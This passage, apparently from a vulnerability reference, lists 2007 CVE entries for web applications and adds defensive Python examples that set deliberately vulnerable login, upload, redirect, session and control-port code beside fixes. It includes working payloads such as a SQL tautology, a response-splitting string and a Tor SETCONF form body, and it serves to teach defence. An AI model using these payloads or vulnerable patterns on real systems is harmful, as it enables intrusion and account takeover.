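    """Stand-in for admin/operators.php handling a delete request."""
    resp = Response()
    try:
        check(session, resp)
        if target in users:       # privileged action
            users.remove(target)
    except NotAuthorized:
        pass
    return resp
```

The test to write against any such check is the one this example encodes: send the privileged request with no credentials, and assert on the server-side state, not on the 302 you get back.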
[CVE-2007-4239] Cross-site scripting (XSS) vulnerability in user/forgotPassStep2.jsp in the admin interface in C-SAM oneWallet 210_07062007
[CVE-2007-4212] Multiple cross-site scripting (XSS) vulnerabilities in the Search Module in PHP-Nuke allow remote attackers to inject arbitrary web script or HTML via a trailing "<" instead of a ">" in (1) the onerror attribute of an IMG element or (2) the onload attribute of an IFRAME element, or (3) to redirect users to other sites via the META tag.
[CVE-2007-4204] Hitachi Groupmax Collaboration - Schedule, as used in Groupmax Collaboration Portal 07-32 through 07-32-/B, uCosminexus Collaboration Portal 06-32 through 06-32-/B, and Groupmax Collaboration Web Client - Mail/Schedule 07-32 through 07-32-/A, can assign schedule data to the wrong user under unspecified conditions, which might allow remote authenticated users to obtain sensitive information.
[CVE-2007-4203] Session fixation vulnerability in Mambo 4.6.2 CMS allows remote attackers to hijack web sessions by setting the Cookie parameter.
[CVE-2007-4192] Multiple cross-site scripting (XSS) vulnerabilities in IDE Group DVD Rental System (DRS) 5.1 before 20070801 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: it is not clear whether IDE Group updates all DRS installations in its role as an application service provider. If so, then this issue should not be included in CVE.
[CVE-2007-4189] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.13 (aka Sunglow) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the (1) com_search, (2) com_content, and (3) mod_login components. NOTE: some of these details are obtained from third party information.
[CVE-2007-4188] Session fixation vulnerability in Joomla! before 1.0.13 (aka Sunglow) allows remote attackers to hijack administrative web sessions via unspecified vectors.
[CVE-2007-4182] Unrestricted file upload vulnerability in index.php in WikiWebWeaver 1.1 and earlier allows remote attackers to upload and execute arbitrary PHP code via an upload action specifying a filename with a double extension such as .gif.php, which is accessible from data/documents/.
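The WikiWebWeaver entry above is the double-extension upload: a check that is satisfied by the presence of ".gif" somewhere in the name accepts "shell.gif.php", and the web server, seeing ".php" last, hands the file to the interpreter. The Python below is an added example (not the WikiWebWeaver code, nor from vulscan or VulDB) contrasting that check with a name policy that decides on the final extension, rejects interpreter extensions anywhere in the name, and never stores the client-chosen name; the allow and deny lists are assumptions for the example:

```python
import os
import secrets
from typing import Optional

ALLOWED = {"gif", "jpg", "jpeg", "png", "pdf", "txt"}
# Extensions a typical PHP host of the period would hand to an interpreter.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar",
              "cgi", "pl", "asp", "aspx", "jsp"}


def upload_check_vulnerable(filename: str) -> bool:
    """Shape of check the entry implies: accept if an image extension appears
    anywhere in the name, so 'shell.gif.php' passes."""
    lower = filename.lower()
    return any("." + ext in lower for ext in ALLOWED)


def safe_store_name(filename: str) -> Optional[str]:
    """Return a server-chosen name '<random>.<ext>' or None if rejected.

    Only the final extension decides the type; every other segment is checked
    against the executable list (Apache mod_mime can act on any extension in
    a name, not only the last); directory parts are dropped; dotfiles and
    extensionless names are refused; the original name is never reused."""
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None
    ext = parts[-1]
    if ext not in ALLOWED or any(seg in EXECUTABLE for seg in parts[1:]):
        return None
    return "%s.%s" % (secrets.token_hex(8), ext)
```

Pair this with an upload directory that the web server will not execute from (no script handler, or a location outside the document root served through a download handler); the entry's "accessible from data/documents/" is the other half of the problem.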
[CVE-2007-4178] Cross-site scripting (XSS) vulnerability in index.php in WebDirector 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the deslocal parameter.
[CVE-2007-4177] Multiple cross-site scripting (XSS) vulnerabilities in Interact before 2.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this might overlap CVE-2007-3328.
[CVE-2007-4175] Multiple cross-site scripting (XSS) vulnerabilities in index.php in OpenRat CMS 0.8-beta1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) subaction and (2) action parameters.
[CVE-2007-4174] Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc configuration file, compromise anonymity, and have other unspecified impact via HTTP POST data containing commands without valid authentication, as demonstrated by an HTML form (1) hosted on a web site or (2) injected by a Tor exit node.
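The Tor entry above is a cross-protocol attack: the browser speaks HTTP to 127.0.0.1:9051, but the listener speaks a line-oriented control protocol, rejects the request line and headers as unknown commands without dropping the connection, and then reads the POST body as further commands. The Python below is an added toy model of that parsing (not Tor's code, and not from vulscan or VulDB); the request bytes are constructed to look like a browser's submission of a `text/plain` form, and the secret and reply codes are assumptions for the example:

```python
from typing import List, Tuple

# Constructed HTTP request, shaped like what a browser sends for an HTML form
# with enctype="text/plain" whose textarea value contains two control lines.
# The attacker hosts the form; the victim's browser submits it to localhost.
FORM_POST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 127.0.0.1:9051\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 44\r\n"
    b"\r\n"
    b"junk=\r\n"
    b"SETCONF ExitNodes=badnode\r\n"
    b"SAVECONF\r\n"
)

AUTH_SECRET = "constructed-secret"   # stands in for the controller password/cookie


def control_port(raw: bytes, require_auth: bool) -> Tuple[List[str], List[str]]:
    """Toy line-oriented control handler. Returns (executed commands, replies).

    Lines it does not recognise (the HTTP request line and headers) get an
    error reply but do not end the session, so parsing continues into the
    body. With require_auth, nothing but AUTHENTICATE is honoured first."""
    executed: List[str] = []
    replies: List[str] = []
    authed = not require_auth
    for line in raw.decode("latin-1").split("\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "AUTHENTICATE":
            authed = arg.strip('"') == AUTH_SECRET
            replies.append("250 OK" if authed else "515 Authentication failed")
        elif verb in ("SETCONF", "SAVECONF", "SIGNAL"):
            if authed:
                executed.append(line)
                replies.append("250 OK")
            else:
                replies.append("514 Authentication required")
        else:
            replies.append("510 Unrecognized command")
    return executed, replies
```

An HTML form cannot carry a secret the page does not know, so requiring authentication (Tor offers HashedControlPassword and CookieAuthentication) closes the hole; Tor additionally drops the connection on an unauthenticated command, where this toy keeps reading. The same cross-protocol reasoning applies to any plaintext line protocol bound to a loopback port that a browser can reach.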
[CVE-2007-4172] Multiple cross-site scripting (XSS) vulnerabilities in Open Webmail (OWM) 2.52 20060831 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) searchtype, (2) longpage, and (3) page parameters to (a) openwebmail-main.pl
[CVE-2007-4166] Cross-site scripting (XSS) vulnerability in index.php in the Unnamed theme 1.217, and Special Edition (SE) 1.02, before 20070804 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757, CVE-2007-4014, and CVE-2007-4165. NOTE: some of these details are obtained from third party information.
[CVE-2007-4165] Cross-site scripting (XSS) vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown
[CVE-2007-4164] CRLF injection vulnerability in the redirect feature in Sun Java System Web Server 6.1 and 7.0 before 20070802, when the redirect Server Application Function (SAF) uses the url-prefix parameter and escape is disabled, or an Error directive uses the url-prefix parameter in obj.conf, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks.
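The Sun Java System Web Server entry above is HTTP response splitting: with escaping disabled, a CR LF pair inside the redirect target ends the Location header, and whatever follows is read by the client as further headers and then as a body. The Python below is an added example (not the server's code, nor from vulscan or VulDB) that builds the redirect both ways and parses the result the way a naive client would; the prefix value and the payload are constructed for the example:

```python
from typing import Dict, Tuple
from urllib.parse import quote

URL_PREFIX = "http://www.example.test"   # stands in for the url-prefix value


def redirect_vulnerable(path: str) -> bytes:
    """Header built by concatenation with escaping disabled, which is the
    configuration the entry describes."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: %s%s\r\n"
            "\r\n" % (URL_PREFIX, path)).encode("latin-1")


def redirect_fixed(path: str) -> bytes:
    """Percent-encode everything a path does not legitimately need, so CR
    and LF become %0D%0A and can no longer terminate the header line."""
    safe_path = quote(path, safe="/?&=")
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: %s%s\r\n"
            "\r\n" % (URL_PREFIX, safe_path)).encode("latin-1")


def parse_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Naive client-side parse: the first blank line ends the headers."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.decode("latin-1").strip()] = value.decode("latin-1").strip()
    return lines[0].decode("latin-1"), headers, body


# Constructed attacker-controlled path: ends the Location header, adds a
# header of its own, then a blank line and a body the browser will render.
SPLIT_PAYLOAD = "/login\r\nSet-Cookie: sid=attacker\r\n\r\n<html>phish</html>"
```

The general rule this shows: any value that reaches a header line must be rejected or encoded if it contains CR, LF or NUL, regardless of which directive or template put it there.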
[CVE-2007-4159] index.html in the HTTP administration interface in certain daemons in TIBCO Rendezvous (RV) 7.5.2 allows remote attackers to obtain sensitive information, such as a user name and IP addresses, via a direct request.
[CVE-2007-4157] PHPBlogger stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing an admin password hash via a direct request for data/pref.db. NOTE: this can be easily leveraged for administrative access because composing the authentication cookie only requires the password hash, not the cleartext version.
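Both the EZPhotoSales entry (CVE-2007-4261) and the PHPBlogger entry above make the same point in their NOTEs: when the server accepts the stored hash itself in a cookie or parameter, the hash is the credential, and a readable password file is a full compromise without any cracking. The Python below is an added example (not either product's code, nor from vulscan or VulDB) putting that comparison beside a design where only the cleartext password is verified and an opaque server-side token is issued; the account, password and PBKDF2 parameters are constructed for the example:

```python
import hashlib
import hmac
import os
import secrets
from typing import Dict, Optional

# Constructed stand-in for the leaked record (data/pref.db, config.dat):
# the attacker has read the file and holds the hash, not the password.
STORED_USER = "admin"
STORED_MD5 = hashlib.md5(b"correct horse").hexdigest()


def cookie_login_vulnerable(cookie: Dict[str, str]) -> bool:
    """Pattern the two entries describe: the cookie (or ConfigPassword
    parameter) carries the hash and the server compares it to the stored
    hash, so knowing the hash is the same as knowing the password."""
    return cookie.get("user") == STORED_USER and cookie.get("hash") == STORED_MD5


class SessionAuth:
    """Verify the cleartext password server-side, then hand out a random
    session token; a leaked verifier is then not a usable credential."""

    def __init__(self, password: bytes) -> None:
        self.salt = os.urandom(16)
        self.verifier = hashlib.pbkdf2_hmac("sha256", password, self.salt, 100_000)
        self.sessions: Dict[str, str] = {}

    def login(self, user: str, password: str) -> Optional[str]:
        if user != STORED_USER:
            return None
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000)
        if not hmac.compare_digest(candidate, self.verifier):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user
        return token

    def user_for(self, cookie: Dict[str, str]) -> Optional[str]:
        return self.sessions.get(cookie.get("session", ""))
```

The first fix in both cases is still the one the entries name: the data files do not belong under the web root. The design above is what keeps the next accidental disclosure from being an immediate administrative login.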
[CVE-2007-4153] Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.2.1 allow remote authenticated administrators to inject arbitrary web script or HTML via (1) the Options Database Table in the Admin Panel, accessed through options.php
[CVE-2007-4146] Cross-site scripting (XSS) vulnerability in webevent.cgi in WebEvent 2.61 through 4.03 allows remote attackers to inject arbitrary web script or HTML via the cmd parameter. NOTE: the provenance of this information is unknown
[CVE-2007-4144] Cross-site scripting (XSS) vulnerability in sample-forms/simple-contact-form-with-preview/simple-contact-form-with-preview.html in MitriDAT eMail Form Processor Pro allows remote attackers to inject arbitrary web script or HTML via the base_path parameter, possibly related to (1) formprocessorpro.php in the PHP version of the product, and (2) formprocessorpro.pl in the Perl version of the product.
[CVE-2007-4142] Cross-site scripting (XSS) vulnerability in IBM Lotus Sametime Server 7.5.1 before 20070731 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a crafted Sametime meeting.
[CVE-2007-4139] Cross-site scripting (XSS) vulnerability in the Temporary Uploads editing functionality (wp-admin/includes/upload.php) in WordPress 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the style parameter to wp-admin/upload.php.
[CVE-2007-4117] ** DISPUTED ** PHP remote file inclusion vulnerability in index.php in phpWebFileManager 0.5 allows remote attackers to execute arbitrary PHP code via a URL in the PN_PathPrefix parameter. NOTE: this issue is disputed by a reliable third party, who demonstrates that PN_PathPrefix is defined before use.
[CVE-2007-4115] Multiple cross-site scripting (XSS) vulnerabilities in IT!CMS (itcms) 0.2 allow remote attackers to inject arbitrary web script or HTML via the wndtitle parameter to (1) lang-en.php, (2) menu-ed.php, or (3) titletext-ed.php.
[CVE-2007-4113] Unspecified vulnerability in Advanced Webhost Billing System (AWBS) before 2.6.0 allows remote authenticated users to obtain configuration data about other dedicated servers via unspecified vectors.
[CVE-2007-4112] Multiple SQL injection vulnerabilities in Advanced Webhost Billing System (AWBS) before 2.6.0, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged for XSS attacks that "bypass AWBS's anti-XSS input validation."
[CVE-2007-4111] SQL injection vulnerability in the login script in Real Estate listing website application template, when logging in as user or manager, allows remote attackers to execute arbitrary SQL commands via the Password parameter.
[CVE-2007-4109] SQL injection vulnerability in sign_in.aspx in WebStore (Online Store Application Template) allows remote attackers to execute arbitrary SQL commands via the Password parameter.
[CVE-2007-4108] SQL injection vulnerability in sign_in.aspx in WebEvents (Online Event Registration Template) allows remote attackers to execute arbitrary SQL commands via the Password parameter.
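The three template entries above (CVE-2007-4111, CVE-2007-4109, CVE-2007-4108) share one defect: the login query is assembled from the Password parameter as a string, so a quote in the password closes the literal and the rest becomes SQL. The Python below is an added example (not the template code, nor from vulscan or VulDB) that runs the string-built query and its parameterised replacement against an in-memory SQLite table; the table, account and payload are constructed for the example, and the cleartext password column is kept only so the query-building point stays visible:

```python
import sqlite3

# Constructed single-user table standing in for the template's users table.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('manager', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query, as in the sign_in.aspx / login script pattern."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the password is data, never part of the statement."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Constructed payload: closes the password literal and appends a tautology, so
# the WHERE clause reads ... password = '' OR '1'='1' and matches every row.
PAYLOAD = "' OR '1'='1"
```

Note that the payload works with any username, valid or not, because the OR applies to the whole preceding AND; that is why the entries describe the Password parameter alone as sufficient.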
[CVE-2007-4104] Multiple cross-site scripting (XSS) vulnerabilities in the WP-FeedStats before 2.4 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, one of which involves an rss2 feed with an invalid or missing blog with an XSS sequence in the query string.
[CVE-2007-4102] Cross-site scripting (XSS) vulnerability in search.php for sBlog 0.7.3 Beta allows remote attackers to inject arbitrary HTML and web script via a leading '"/></> sequence in the search string.
[CVE-2007-4100] MLDonkey before 2.9.0 does not load certain code from $MLDONKEY/web_infos/ before the network modules become active, which allows remote attackers to bypass the IP blocklist.
[CVE-2007-4093] Minb Is Not a Blog (minb) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing usernames and encrypted passwords via a direct request for db/users.db.
[CVE-2007-4090] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to inc/lib/screen.php or (2) the title parameter to post.php. NOTE: vector 2 might overlap CVE-2006-6283. NOTE: the provenance of this information is unknown
[CVE-2007-4088] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) f, (3) quote, and (4) act parameters to cp.php
[CVE-2007-4083] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft AskMe Pro allow remote attackers to inject arbitrary web script or HTML via the (1) cat_id parameter to search.php or the (2) typ parameter to register.php.
[CVE-2007-4082] Cross-site scripting (XSS) vulnerability in contact_author.php in AlstraSoft Article Manager Pro allows remote attackers to inject arbitrary web script or HTML via the userid parameter.
[CVE-2007-4081] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Affiliate Network Pro allow remote attackers to inject arbitrary web script or HTML via vectors in (a) merchants/index.php, including the (1) id or (2) msg parameter in a programedit action
[CVE-2007-4080] Cross-site scripting (XSS) vulnerability in index.php in AlstraSoft E-Friends allows remote attackers to inject arbitrary web script or HTML via the p_id parameter in a people_card action. NOTE: this might overlap CVE-2006-2564.
[CVE-2007-4079] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft SMS Text Messaging Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) domain or (2) q parameter to (a) admin/membersearch.php, or (3) the userid parameter to (b) admin/edituser.php.
[CVE-2007-4078] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Text Ads Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) r parameter to (a) forgot_uid.php, the (2) query or (3) sk parameter to (b) search_results.php, or (4) the pageId parameter to (c) website_page.php.
[CVE-2007-4077] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Video Share Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) msg, (2) page, (3) viewkey, or (4) viewtype parameter to (a) view_video.php
[CVE-2007-4075] Cross-site scripting (XSS) vulnerability in index.asp in Alisveris Sitesi Scripti allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search mod action. NOTE: the provenance of this information is unknown
[CVE-2007-4073] Webbler CMS before 3.1.6 does not properly restrict use of "mail a friend" forms, which allows remote attackers to send arbitrary amounts of forged e-mail. NOTE: this could be leveraged for spam or phishing attacks.
[CVE-2007-4072] Webbler CMS before 3.1.6 provides the full installation path within HTML comments in certain documents, which allows remote attackers to obtain sensitive information by viewing the HTML source, as demonstrated by viewing the source generated from index.php.
[CVE-2007-4071] Multiple cross-site scripting (XSS) vulnerabilities in uploader/index.php in Webbler CMS before 3.1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) page or (2) login parameter.
[CVE-2007-4068] Multiple SQL injection vulnerabilities in Webyapar 2.0 allow remote attackers to execute arbitrary SQL commands via (1) the kat_id parameter to the default URI in a download action or (2) the id parameter to the default URI in a duyurular_detay action.
[CVE-2007-4067] Absolute path traversal vulnerability in the clInetSuiteX6.clWebDav ActiveX control in CLINETSUITEX6.OCX in Clever Internet ActiveX Suite 6.2 allows remote attackers to create or overwrite arbitrary files via a full pathname in the second argument to the GetToFile method. NOTE: some of these details are obtained from third party information.
[CVE-2007-4064] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 5.x before 5.2, and 4.7.x before 4.7.7, (1) allow remote attackers to inject arbitrary web script or HTML via "some server variables," including PHP_SELF
[CVE-2007-4052] Cross-site scripting (XSS) vulnerability in utilities/login.asp in nukedit 4.9.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter. NOTE: the provenance of this information is unknown
[CVE-2007-4050] Unspecified vulnerability in WebUI in ADempiere Bazaar before 3.3 beta Victoria edition allows remote attackers to access system-level windows via unspecified vectors.
[CVE-2007-4048] Cross-site scripting (XSS) vulnerability in index.php in phpSysInfo 2.5.4-dev and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2007-4028] Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-4024] Cross-site scripting (XSS) vulnerability in W1L3D4_aramasonuc.asp in W1L3D4 Philboard 0.3 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. NOTE: the provenance of this information is unknown
[CVE-2007-4023] Cross-site scripting (XSS) vulnerability in the login CGI program in Aruba Mobility Controller 2.5.4.18 and earlier, and 2.4.8.6-FIPS and earlier FIPS versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4022] Cross-site scripting (XSS) vulnerability in frontend/x/htaccess/changepro.html in cPanel 10.9.1 allows remote attackers to inject arbitrary web script or HTML via the resname parameter.
[CVE-2007-4021] Multiple cross-site scripting (XSS) vulnerabilities in login.php in Brain Book Software Secure 1.0.20070629 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user and (2) pwd parameters.
[CVE-2007-4020] Multiple cross-site scripting (XSS) vulnerabilities in login.php in AdMan 1.0.20051202 FF 3 patch and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user and (2) pwd parameters.
[CVE-2007-4018] Citrix Access Gateway Advanced Edition before firmware 4.5.5 allows attackers to redirect users to arbitrary web sites and conduct phishing attacks via unknown vectors.
[CVE-2007-4017] Cross-site request forgery (CSRF) vulnerability in the web-based administration console in Citrix Access Gateway before firmware 4.5.5 allows remote attackers to perform certain configuration changes as administrators.
[CVE-2007-4014] Cross-site scripting (XSS) vulnerability in a certain index.php installation script related to the (1) Blix 0.9.1, (2) Blixed 1.0, and (3) BlixKrieg (Blix Krieg) 2.2 themes for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757. NOTE: the provenance of this information is unknown
[CVE-2007-3991] Multiple cross-site scripting (XSS) vulnerabilities in cv.asp in Asp cvmatik 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Adiniz (Ady), (2) Soyadiniz (Soyady), (3) Ehliyet, (4) Askerlik, and (5) GSM parameters
[CVE-2007-3989] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in Dora Emlak 1.0, when the goster parameter is set to iletisim, allow remote attackers to inject arbitrary web script or HTML via the (1) Adiniz and (2) Soyadiniz parameters
[CVE-2007-3988] Session fixation vulnerability in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2007-3978] Session fixation vulnerability in bwired allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
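Five entries in this stretch are session fixation (Ampache, CVE-2007-4438; Mambo, CVE-2007-4203; Joomla!, CVE-2007-4188; VHCS, CVE-2007-3988; bwired above), three of them explicitly via a client-supplied PHPSESSID. The common mechanism: the application adopts whatever session id the client presents, then attaches the login to that id, so an attacker who planted the id owns the session after the victim authenticates. The Python below is an added model of that flow (not any of these products' code, nor from vulscan or VulDB); the account, the session table and the fixed id are constructed for the example:

```python
import secrets
from typing import Dict, Optional

CREDENTIALS = {"victim": "hunter2"}   # constructed account


class Sessions:
    """Server-side session table keyed by session id (what PHPSESSID names)."""

    def __init__(self) -> None:
        self.table: Dict[str, dict] = {}

    def resume_or_create(self, sid: Optional[str]) -> str:
        # PHP's default before session.use_strict_mode: an unknown id
        # presented by the client is simply adopted as a new session.
        if sid is None:
            sid = secrets.token_urlsafe(24)
        self.table.setdefault(sid, {})
        return sid


def login_vulnerable(sessions: Sessions, presented_sid: Optional[str],
                     user: str, password: str) -> str:
    """Privilege is attached to the id the client arrived with."""
    sid = sessions.resume_or_create(presented_sid)
    if CREDENTIALS.get(user) == password:
        sessions.table[sid]["user"] = user
    return sid


def login_fixed(sessions: Sessions, presented_sid: Optional[str],
                user: str, password: str) -> str:
    """Equivalent of session_regenerate_id(true) at the privilege change:
    a fresh id is issued and the pre-authentication id is destroyed."""
    sid = sessions.resume_or_create(presented_sid)
    if CREDENTIALS.get(user) != password:
        return sid
    new_sid = secrets.token_urlsafe(24)
    sessions.table[new_sid] = {"user": user}
    sessions.table.pop(sid, None)
    return new_sid


def whoami(sessions: Sessions, sid: str) -> Optional[str]:
    return sessions.table.get(sid, {}).get("user")
```

Regenerating the id on login is the application-level fix; refusing to adopt unknown ids at all (PHP's `session.use_strict_mode`) and never accepting the id from the URL remove the planting step as well.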
[CVE-2007-3977] Cross-site scripting (XSS) vulnerability in bwired allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3975] Cross-site scripting (XSS) vulnerability in index.php in Elite Forum 1.0.0.0 allows remote attackers to inject arbitrary web script or HTML via the title parameter in a ptopic action, a different vulnerability than CVE-2005-3412.
[CVE-2007-3973] Multiple cross-site scripting (XSS) vulnerabilities in JBlog 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) index.php, or the (2) search parameter or (3) theme cookie to (b) recherche.php.
[CVE-2007-3963] Multiple cross-site scripting (XSS) vulnerabilities in UseBB 1.0.7, and possibly other 1.0.x versions, allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF) to (1) upgrade-0-2-3.php, (2) upgrade-0-3.php, or (3) upgrade-0-4.php in install/, a different vulnerability than CVE-2005-4193.
[CVE-2007-3960] Multiple unspecified vulnerabilities in IBM WebSphere Application Server (WAS) before Fix Pack 21 (6.0.2.21) have unknown impact and attack vectors, aka (1) PK33799, or (2) a "Potential security exposure" in the Samples component (PK40213).
[CVE-2007-3956] TeamSpeak WebServer 2.0 for Windows does not validate parameter value lengths and does not expire TCP sessions, which allows remote attackers to cause a denial of service (CPU and memory consumption) via long username and password parameters in a request to login.tscmd on TCP port 14534.
[CVE-2007-3950] lighttpd 1.4.15, when run on 32 bit platforms, allows remote attackers to cause a denial of service (daemon crash) via unspecified vectors involving the use of incompatible format specifiers in certain debugging messages in the (1) mod_scgi, (2) mod_fastcgi, and (3) mod_webdav modules.
[CVE-2007-3944] Multiple heap-based buffer overflows in the Perl Compatible Regular Expressions (PCRE) library in the JavaScript engine in WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, allow remote attackers to execute arbitrary code via certain JavaScript regular expressions. NOTE: this issue was originally reported only for MobileSafari on the iPhone. NOTE: it is not clear whether this stems from an issue in the original distribution of PCRE, which might already have a separate CVE identifier.
[CVE-2007-3941] Cross-site scripting (XSS) vulnerability in profile.php in Jasmine CMS 1.0_1 allows remote authenticated users to inject arbitrary web script or HTML via the profile_email parameter. NOTE: the provenance of this information is unknown
[CVE-2007-3940] Cross-site scripting (XSS) vulnerability in default.asp in QuickerSite 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the svalue parameter in a search action. NOTE: some of these details are obtained from third party information.
[CVE-2007-3918] Cross-site scripting (XSS) vulnerability in account/verify.php in GForge 4.6b2 allows remote attackers to inject arbitrary web script or HTML via the confirm_hash parameter.
[CVE-2007-3888] Multiple cross-site scripting (XSS) vulnerabilities in Insanely Simple Blog 0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the search action, possibly related to the term parameter to index.php
[CVE-2007-3887] Multiple cross-site scripting (XSS) vulnerabilities in mesaj_formu.asp in ASP Ziyaretci Defteri 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Isim, (2) Mesajiniz, and (3) E-posta fields. NOTE: these probably correspond to the isim, mesaj, and posta parameters to save.php.
[CVE-2007-3886] Cross-site scripting (XSS) vulnerability in default.asp in Element CMS allows remote attackers to inject arbitrary web script or HTML via the s parameter in a search pID action.
[CVE-2007-3885] Cross-site scripting (XSS) vulnerability in philboard_search.asp in husrevforum 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the searchterms parameter. NOTE: the provenance of this information is unknown
[CVE-2007-3871] Stampit Web uses guessable id values for online stamp purchases, which allows remote attackers to cause a denial of service (stamp invalidation) via a SOAP request with an id value for a stamp that has not yet been printed.
[CVE-2007-3858] Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 allow remote authenticated users to have an unknown impact via (1) EXFSYS.DBMS_RLMGR_UTL in Rules Manager (DB11) and (2) Program Interface (DB13).
[CVE-2007-3842] Cross-site scripting (XSS) vulnerability in the 8e6 R3000 Enterprise Filter before 2.0.05 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this may be the same as CVE-2007-2970.
[CVE-2007-3839] Cross-site scripting (XSS) vulnerability in takeprofedit.php in TBDev.NET DR 010306 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the avatar parameter. NOTE: this may be related to the tracker program in the Janitor package. NOTE: the provenance of this information is unknown.
[CVE-2007-3838] Cross-site scripting (XSS) vulnerability in takeprofedit.php in TBDev.NET DR 11-10-05-BETA-SF1:111005 and earlier allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the avatar parameter. NOTE: this may be related to the tracker program in the Janitor package. NOTE: the provenance of this information is unknown.
[CVE-2007-3835] Cross-site scripting (XSS) vulnerability in Ex Libris MetaLib 3.13 and 4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a resource id that can be discovered through a search.
[CVE-2007-3834] Multiple cross-site scripting (XSS) vulnerabilities in Ex Libris ALEPH allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a URL that can be discovered through a keyword search. NOTE: this may be related to the MetaLib XSS issue, CVE-2007-3835.
[CVE-2007-3830] Cross-site scripting (XSS) vulnerability in alert.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 allows remote attackers to inject arbitrary web script or HTML via the reminder parameter.
[CVE-2007-3822] Multiple cross-site scripting (XSS) vulnerabilities in Webcit before 7.11 allow remote attackers to inject arbitrary web script or HTML via (1) the who parameter to showuser
